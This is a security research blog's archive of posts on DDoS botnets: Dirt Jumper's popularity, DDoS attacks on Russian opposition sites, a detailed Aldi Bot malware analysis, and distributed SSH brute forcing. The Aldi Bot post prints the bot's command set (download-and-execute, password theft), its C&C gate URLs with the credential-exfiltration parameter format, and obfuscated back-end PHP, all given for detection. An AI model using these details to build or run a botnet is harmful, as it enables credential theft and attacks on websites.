Tag Archives : Botnet May 2012

Dirt Jumper DDoS Bot Increasingly Popular

By: Jose -

We’ve profiled the Dirt Jumper DDoS bot before and shown its evolution over the years. We then took this analysis into our zoo to see which DDoS bot families are growing in popularity with attackers. The marketplace has opened up significantly (see Curt’s excellent overview of DDoS tools and services) in recent years, and with that comes competition.

In the past few years, the popular kit we saw in our zoo was Black Energy, an easy to use, powerful DDoS bot distributed in Russian-language spheres. You could find it on the net for anywhere from $40 to free, depending on how hard you looked. Starting in 2009, Black Energy version 2 was available. It boasted a modular architecture and included banking theft Trojan functionality to augment the DDoS functionality. Another competitor that appeared in this timeframe was Optima or Darkness. It then becomes interesting to look in one’s zoo to see which families are popular at present.

The graphic below is from some quick analysis of our zoo, looking at our automated classification system that tags samples with the appropriate family name. Optima includes the group of Darkness, Optima and Votwup samples we have seen; Black Energy focuses on the BEv1 samples we have seen in the wild, and omits any BEv2 samples we have; Dirt Jumper includes all Russkill variants and Dirt Jumper variants we have seen. What we saw was a bit surprising, namely the rate at which Dirt Jumper samples appear in our zoo and quickly overtake the other families in terms of popularity. This matches anecdotally what we had seen, but the magnitude itself is surprising.

Some ideas as to what is going on:

  • With BEv2, the Black Energy author (back in 2009 which it was being developed and tested) appears to have tried to piggy back on the Zeus and SpyEye craze that was really gathering momentum at the time. Modules to steal from banks would have been a great complement, in theory, but in reality BE targeted DDoS actors who hang out in different forums than the financial thieves. With the notable exception of the Gameover series of attacks, these two groups don’t spent a lot of time together from my own observations.
  • Optima and Darkness make a decent product. I didn’t keep track of pricing or advertising, but their usability, reliability and features all come together to make a great follow-on to the Black Energy model (kit which includes an easy to use web UI and a builder to configure the feature-rich DDoS bot). Why it didn’t take off is really something I can’t explain.
  • Finally, Dirt Jumper’s meteoric rise in popularity in this time frame suggests that author (and any promotors they have working for them) is doing something right. Features are getting incorporated well, new versions are released, and the bot’s got traction in the community. An alternative explanation is that the leaks we see leading to “unofficial versions” are also classified as DJ and explain the rise.

In this competitive underground world, it’s fascinating to see market forces at work so clearly. Bear in mind that all this popularity leads to attention, both in terms of CnC tracking (and shutdown) and AV detection, which is counter-productive. We’ll see how these guys react to larger responses.

DDoS Attacks in Russia Added to Protests

By: Jose -

2011, and now 2012, appear to be years of major populist protests regarding political processes around the world. Russia is no different. News reports of protests in the streets of Moscow have been increasing, with protesters demanding election reforms and fairness. It is in this backdrop that we’re seeing DDoS attacks against some websites.

A recent BBC News story on Russian protests about upcoming elections caused me to go looking in our database for domestic DDoS attacks within Russia on sympathetic sites calling for election changes. We’ve seen this sort of thing in the past, specifically in the 2009 run-up to the elections where opponents to Putin and Medvedev were attacked, so it seems natural to expect it this time.

Inspection of our botnet tracking logs from Project Bladerunner show multiple sites under attack recently that appear to be politically motivated. Four are news sites (three belong to journalufa). The other is a candidates site, and all attacks are ongoing. The botnets here are Dirt Jumper and Black Energy. Despite press that the radio station Echo Moscow is getting political pressure for it’s pro-change reporting, we haven’t yet seen their properties struck by attacks as we have in the past.

First seen

Last seen

Target Host

2012-02-14 22:57:53 2012-02-15 10:58:01 www.muhamediarov.ru
2012-02-14 06:58:24 2012-02-14 06:58:25 journalufa.livejournal.com
2012-02-14 06:58:22 2012-02-14 06:58:24 journalufa.wordpress.com
2012-02-10 06:58:50 2012-02-15 10:57:59 cik-ufa.ru
2011-09-29 12:28:32 2012-02-15 10:58:01 journalufa.com

As you can see from the following screenshots taken today, two of the sites are accessible, but one of them notes that it’s under attack.

CIK-UFA under attack

Journal UFA under attack

The botnets behind these attacks have been actively involved in many DDoS attacks in recent weeks, some of which are on commercial properties, and some of which are on news sites. These appear to be their most overtly political targets. In short, these do not appear to be purpose built for political attacks.

We’re keeping an eye on this situation, expecting it to continue or get worse as the elections approach on March 4.

DDoS Watch: Keeping an Eye on Aldi Bot

By: cwilson -

Background

The intention of this entry is to profile some elements of the Aldi Bot in order to provide value for the security operations community and malware research community.

Aldi Bot is a newer inexpensive DDoS bot that is growing in popularity. Recent data (September 30 2011) suggests that there are at least 50 distinct Aldi bot binaries that have been seen in the wild with 44 unique Command & Control points. We see the bot active in Russia, the Ukraine, the US, and Germany. While it has been stated that Aldi Bot won’t be developed further, the source code has leaked which makes it easy to find and use.

G-Data and others in the security community have discussed this bot in recent weeks. Of special interest to those concerned with availability, Aldi Bot offers HTTP and TCP DDoS capabilities along with Firefox, Pidgin and jDownloader credential theft, the creation of a SOCKS5 proxy and the ability to download and execute malicious code of the attacker’s choice.

To underscore its attack capabilities, Aldi Bot was used to DDoS bka.de, the German federal police website in a demonstration video.

Figure 1 – Aldi Bot demonstration video launching DDoS attack on bka.de

click here to view full size image

All it takes is one bot such as Aldi Bot or other tool such as a Remote Access Trojan (RAT) to provide an attacker a handhold on the inside of an organization that can lead to a much larger security breach. It is now well-known that attacks involving the exfiltration of sensitive data typically start with one smaller compromise that is then leveraged for additional access. Additionally Aldi Bot steals passwords, and passwords are often re-used for convenience even though it is a dangerous practice. Without proper monitoring of system and network activity, such infected nodes can be long-lived and pose significant risk.

Thankfully in this case it seems that the Aldi Bot back-ends aren’t long lasting. Of the list of 41 back-ends that I obtained on September 30, 2011, it appears that only 13 of them were still online as of October 3, 2011.

Detection & uniqueness of threat

The author of Aldi Bot suggests that the bot will not be FUD (fully undetectable) and indeed Aldi Bot’s initial antivirus detection based on a September 22, 2011 analysis of the sample I analyzed (MD5: c903b63346c90d29b0fe711a68a747ba) features a 72.7% detection rate, with four vendors using a term similar to “Aldi Bot” such as “Abot” or “Albot”. The rest of the detections are generic.

http://www.virustotal.com/file-scan/report.html?id=dd29102bd9dc8e6599c38ea6dab9164bc5f072f2de0dc5706f120199c14b8949-1316731656

As antivirus detection can be an indicator that triggers an organizations Incident Response function, responders will have to dig a little deeper in many cases because generic alerts don’t provide much context as to the true nature of the threat. An example of this is a user seeking assistance with an Aldi Bot infection using the default filename “jetzt_kommt_aldi.exe” on September 4, 2011 on a Microsoft forum:

http://answers.microsoft.com/en-us/protect/forum/protect_scanning/jetztkommtaldiexe/27675ad5-45ba-4958-a6db-87b96a57164e?msgId=37b909f4-35f7-4d72-a0e3-a6704207c66b

While it has been speculated that Aldi Bot has borrowed from the Zeus banking Trojan source code release in early 2011, Aldi bot is written in Delphi with a PHP back-end, while Zeus is written in C++ with PHP on the back-end. The only obvious similarity between Zeus and Aldi Bot that I can see at first glance is that both of them tend to use a filename called gate.php on the web-based back-end as a “drop zone” to process stolen data.

Commands

Aldi bot’s commands are as follows:

  • ‘StartHTTP’ – starts an HTTP DDoS attack
  • ‘StartTCP’ – starts a TCP DDoS attack
  • ‘StopHTTPDDoS’ – stops an HTTP DDoS attack
  • ‘StopTCPDDoS’ – stops a TCP DDoS attack
  • ‘StopDDoS’ – apparently stops all DDoS attacks
  • ‘DownloadEx’ – download and execute other code (malware)
  • ‘CreateSocks’ – creates a SOCKS5 proxy
  • ‘StealData’ – trigger password stealing functionality
  • ‘Update’ – updates the bot

Custom User-Agent gets the goods

A potentially useful tidbit of information was found while reverse engineering the bot stub. While looking at an InternetOpenA API call associated with outbound activity, I noticed that a custom User-Agent “Aldi Bot FTW! :D” is used. It should be trivial to monitor for the presence of this string on the network.

push 10h ; dwFlags
push offset szProxyBypass ; lpszProxyBypass
push offset szProxyBypass ; lpszProxy
push 0 ; dwAccessType
push offset aAldiBotFtwD ; "Aldi Bot FTW! :D"
call InternetOpenA

If the wrong User-Agent is sent, then the back-end will not respond. On the wire a request to gate.php from an infected host looks similar to this (values are obscured for security)

Figure 2 – infected host reaching out to back-end at initial infection time

Click here to view full size image

Once the source code for Aldi Bot was obtained, it was easy to find this function:

Figure 3 – Delphi source code indicates custom User-Agent

Click here to view full size iamge

The back-end code that performs this checking was found with a datestamp from August 27, 2011 (the initial announcement for Aldi bot itself was apparently made one day later on an underground forum on August 28, 2011). The PHP code that performs the User-Agent checking is as follows:
function dnSOIAN0EWrU($XbJ41W11sYuW){
$XbJ41W11sYuW=str_replace(' ','',$XbJ41W11sYuW);
$XbJ41W11sYuW=str_replace('x','',$XbJ41W11sYuW);
$XbJ41W11sYPW=pack('H*',$XbJ41W11sYuW);
return $XbJ41W11sYPW;
}
$_SERVER['HTTP_USER_AGENT']!=base64_decode(strrev(dnSOIAN0EWrU(strrev(substr('94320157587b6163524342633157
625c62585943514632514d3d3',-48))))) ? exit(): '';

While decoding what’s going on here would be an interesting exercise, it’s easier just to see what’s happening with a slight modification to echo the expected User-Agent string:
$ua = base64_decode(strrev(dnSOIAN0EWrU(strrev(substr('94320157587b6163524342633157
625c62585943514632514d3d3',-48)))));
echo "Expected User-Agent: [", $ua, "]";

Running the PHP code then displays the expected string:

$ php -f aldi.php
Expected User-Agent: [Aldi Bot FTW! :D]

Analyzing back-end functions and detecting Aldi Bot on the wire

Outbound traffic to the back-end “drop zone” will use an HTTP GET string that looks similar to this:

/gate.php?hwid=&pc=&localip=&winver=

The value for the hwid parameter is uniquely calculated based on the systems hardware. The pc parameter is the PC’s name. The localip parameter is the local IP address of the system and winver is the version of windows installed, with x32 or x64 appended to match a 32 or 64 bit architecture.

When stolen data (only passwords at this time) is exfiltrated, a ‘&steal=’ parameter will be used in the URL that will also include the hwid value as such:
/gate.php?hwid=&steal=
The value passed in the steal parameter will be the type of credential and then the actual password values stolen from the system in the format of URL|User|Pass. Here is the back-end code responsible for storing the stolen credentials:

Figure 4 – PHP code handling stolen credentials

Click here to view full size image

A quick google query as of 10/3/2011 with elements from the gate.php string reveals two obvious infections (both reported for takedown) – one Windows 7 and one Windows XP:

http://<REMOVED>/b0ts4ev3ryb0dy/gate.php/gate.php?hwid=287389320&pc=%EE%E9%EB%EC-PC&localip=192.168.123.100&winver=Windows%207%20Professional%20×32.

http://<REMOVED>.ru/gate.php/gate.php?hwid=2001606274&pc=HOME-OFF-D5F0AC&localip=192.168.102.23&winver=Windows%20XP%20Professional%20×32.

The corresponding PHP back-end code:
//GET
$hwid = safe_xss($_GET['hwid']);
$localip = safe_xss($_GET['localip']);
$pc = safe_xss($_GET['pc']);
$winver = safe_xss($_GET['winver']);

This screenshot of bot statistics from one C&C shows that there were 239 bots online at one point, however only 8 bots were active, making this particular instance of the Aldi botnet very small. This could be due to reasonably good antivirus detection of the bot. The pie chart looks incorrect, however stats indicate that the Netherlands experienced the highest infection rate at 57.7% followed by the US with 10.5%.

Figure 5 – bot stats found on one C&C

Click here to view full size image

While the Aldi Bot source code has since been obtained, at first we only had a binary copy. In that case, the Interactive Delphi Reconstructor (IDR) does a pretty nice analysis job. IDR worked better than IDA or DeDe when working with Aldi Bot.

Figure 6 – IDR analysis of back-end traffic generation

Click here to view full size image

The default names of other Aldi bot back-end webapp components of interest (useful for network monitoring or probing on a C&C) include:
admin/inc
admin/inc/config.php
admin/inc/sess.php
admin/functions.php
admin/login.php
admin/pie.php
admin/index.php
admin/downlogs/
admin/img/aldi.gif
admin/js
admin/uploads/
geoip.php
index.php?id=stats
index.php?id=bots
index.php?id=bots&p=0
index.php?id=tasks
index.php?id=logs
index.php?id=upload
index.php?id=showlogs
index.php?logout

In addition to getting some value from watching for these patterns on the network, a review of back-ends indicates that sometimes certain folders such as admin/inc have directory indexing enabled which makes for an obvious C&C fingerprint.

Other indicators may include the following strings that have been seen in at least one Aldi Bot server-side install:

  • “Aldi Bot – installed by till7”
  • “StealData!” (from a misconfigured server)

The back-end login page looks like this:

Download and Execute in practice

As an example of the possible use for the “DownloadEx” function, a bit of poking at some active Aldi Bot campaign reveals the following:

1) Installation of yet another DDoS bot called Infinity Bot that has HTTP, ICMP, and TCP flooding capabilities.

2) Execution of the dScriptSt4r Anti-Virus Deleter, a simple batch file that tries to disable as many anti-virus applications as possible

3) Secure-Soft Stealer 5.20 that’s designed to steal credentials from the following applications:

  1. Trillian, Pidgin, Vitalwerks dynamic update client, DynDNS updater client, Steam, Opera, Firefox, Safari, jDownloader, Outlook, eMule, BulletProof FTP, Flash FXP, Miranda, Windows key, FileZilla, SmartFTP, MSN, ICQ, CoreFTP, and perhaps others.

Aldi Bot is just another in a long line of DDoS tools, however its inexpensive nature seems to have made it quickly popular. Underground forum posts praise its ability to perform effective DDoS attacks, which may have also contributed to the increase in popularity.

Figure 8 – Aldi Bot graphic from the back-end kit

References:

G Data: Botnets on discount:

http://blog.gdatasoftware.com/blog/article/botnets-on-discount.html

H-Online: Malware for everyone – Aldi Bot at a discount price

http://www.h-online.com/security/news/item/Malware-for-everyone-Aldi-Bot-at-a-discount-price-1346594.html

Aldi Bot – bka.de DDoS video:

http://www.youtube.com/watch?v=UskKFTFVLyI

Thanks to Arbor’s ASERT Team, Damballa and other anonymous contributors for additional data used in this analysis.

Highlights of Arbor Networks’ Fourth Annual Worldwide Infrastructure Security Report

By: Arbor Networks -

Highlights of Arbor Networks’ Fourth Annual Worldwide Infrastructure Security Report

Presenters:

  • Tom Bienkowski, Director of Product Marketing, Arbor Networks
  • Danny McPherson, Vice President and Chief Security Officer, Arbor Networks

Description:

For the past four years Arbor Networks has conducted a survey of many of the world’s network operators. This survey covers topics such as: Most significant network based threats; common attack vectors and targets; methods of attack detection and mitigation; and other related questions regarding size of staff, use of law enforcement, managed security services, etc. The results of the survey are compiled into the Worldwide Infrastructure Security Report.

This 45 minute video will focus on the more interesting highlights of this year’s report which was a culmination of responses from approximately 60 different network operators from around the world and their experiences in 2008.

Run time: 49:41 (Registration is required to view this Webcast – Click here to be taken to the registration page)

Reblog this post [with Zemanta]

New attack patterns emerge in 2009

By: Arbor Networks -

Botnets were just the beginning. The bad guys will continue to use these to try and steal your data, but more sophisticated attacks over the application layer and targeted network attacks are on the way.  In this Network World Podcast, Danny McPherson from Arbor Networks discusses the new ways that hackers will be trying to get into (and steal information) from your network in 2009.

Reblog this post [with Zemanta]

Distributed SSH Brute Force Attacks

By: Jose -

Recently a couple of news reports have come in that suggest that someone has changed how they do SSH brute force attacks:

The change is this: instead of the hosts from the SSH botnet pounding away as fast as possible from the same IP over and over and over again, where you see it failing and failing and failing, these guys have moved to what they should have been doing, coordination. They’re only trying one or two logins from a single IP before moving on; another IP from the botnet tries a new login. The IP may re-appear but only after a while. This defeats some of the simple rate-based triggers for local protection. What’s more is they’re only trying very specific SSH servers. They seem to not be trying everything in the book.

The answer to this is to use a blacklist, working on the theory that someone else has seen this IP scanning and trying logins and failing. Here’s a list of blacklists you can use (import them with caution, use at your own risk, etc).

These lists MAY help you prevent the attempts from the botnet (and many others). I’ve worked with the person (let’s call him C) who both gathered this list and did more analysis of this distributed, patient scanning to look at an overlap between Arbor’s SSH scanner and bruter blacklist and his own blacklist and we came up with about 12% overlap. Not great, and I wonder how much overlap there will be in the future (ie if we go forward one day would the Arbor SSH blacklist have prevented a bruter from trying logins). I would suggest contributing to those blacklists to help everyone, there’s a lot of SSH-bots out there at this point!

Also, here’s a 2d snapshot of ATLAS’ SSH blacklist: http://atlas-public.ec2.arbor.net/public/ssh_attackers

What we’re lacking so far is a capture of the tools on the box, the bot code. I analyzed a case earlier this week where an SSH server was broken into via SSH scanning and it was just a typical IROFFER network. This looks far more substantial than that.

If you have tracks matching this AND you want to help analyze this, please be in contact.

Many thanks to C for his great analysis of the events so far. He, too, is looking for “what comes next”.

Reblog this post [with Zemanta]